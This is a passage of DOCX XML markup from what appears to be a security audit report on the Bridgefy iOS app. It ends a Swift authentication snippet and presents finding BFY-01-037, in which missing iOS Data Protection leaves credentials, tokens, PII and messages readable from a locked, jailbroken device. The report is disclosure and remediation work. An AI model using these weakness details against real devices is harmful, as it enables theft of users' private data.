          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>let outcome = self.outcomeForLAError(errorParam: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>authenticationError,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="5965" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>defaultErrorDescription:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>L10n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.Authentication.Local.Error.default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="2303" w:right="5637" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>outcome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="1979"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>completion(.failure(error: L10n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.Authentication.Local.Error.default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2699" w:right="2112" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.cancel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.failure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.unexpectedFailure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>completion(outcome)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to extrapolate the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to resolve this issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250040" w:id="15"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-037</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>PII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF9900"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy partially fixed this issue and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is valid. Implementation of the remaining hardening guidance is ongoing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>currently</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>implement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Protection </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>features in iOS. This means that most files are encrypted with the default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>NSFileProtectionCompleteUntilFirstUserAuthentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>encryption, which keeps the decryption key in memory while the device is locked. Moreover, this is the least secure form of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>iOS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>physical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the device could leverage this weakness to read the decryption key from memory and gain access to local app data files, without needing to unlock the device. Further scrutiny revealed that some of the unprotected files display credentials, tokens, user PII, broadcast and direct messages, prekeys, and alternative information. Please note that, as demonstrated in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>BFY-01-035</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, the obtained phone number and verification code can be used to obtain valid ID and refresh tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To replicate this issue, a jailbroken phone was left at rest for a few minutes on the lock screen, then all application files were retrieved for inspection of any potential data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leak.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>handful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>examples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>revealed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>retrieved</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>during</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487601664">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>109107</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="43" name="Graphic 43"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="43" name="Graphic 43"/>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8.591162pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15714816;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape32" coordorigin="1440,172" coordsize="2880,0" path="m1440,172l4320,172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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId87">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.apple.com/.../nsfileprotectioncompleteuntilfirstuserauthentication</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BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
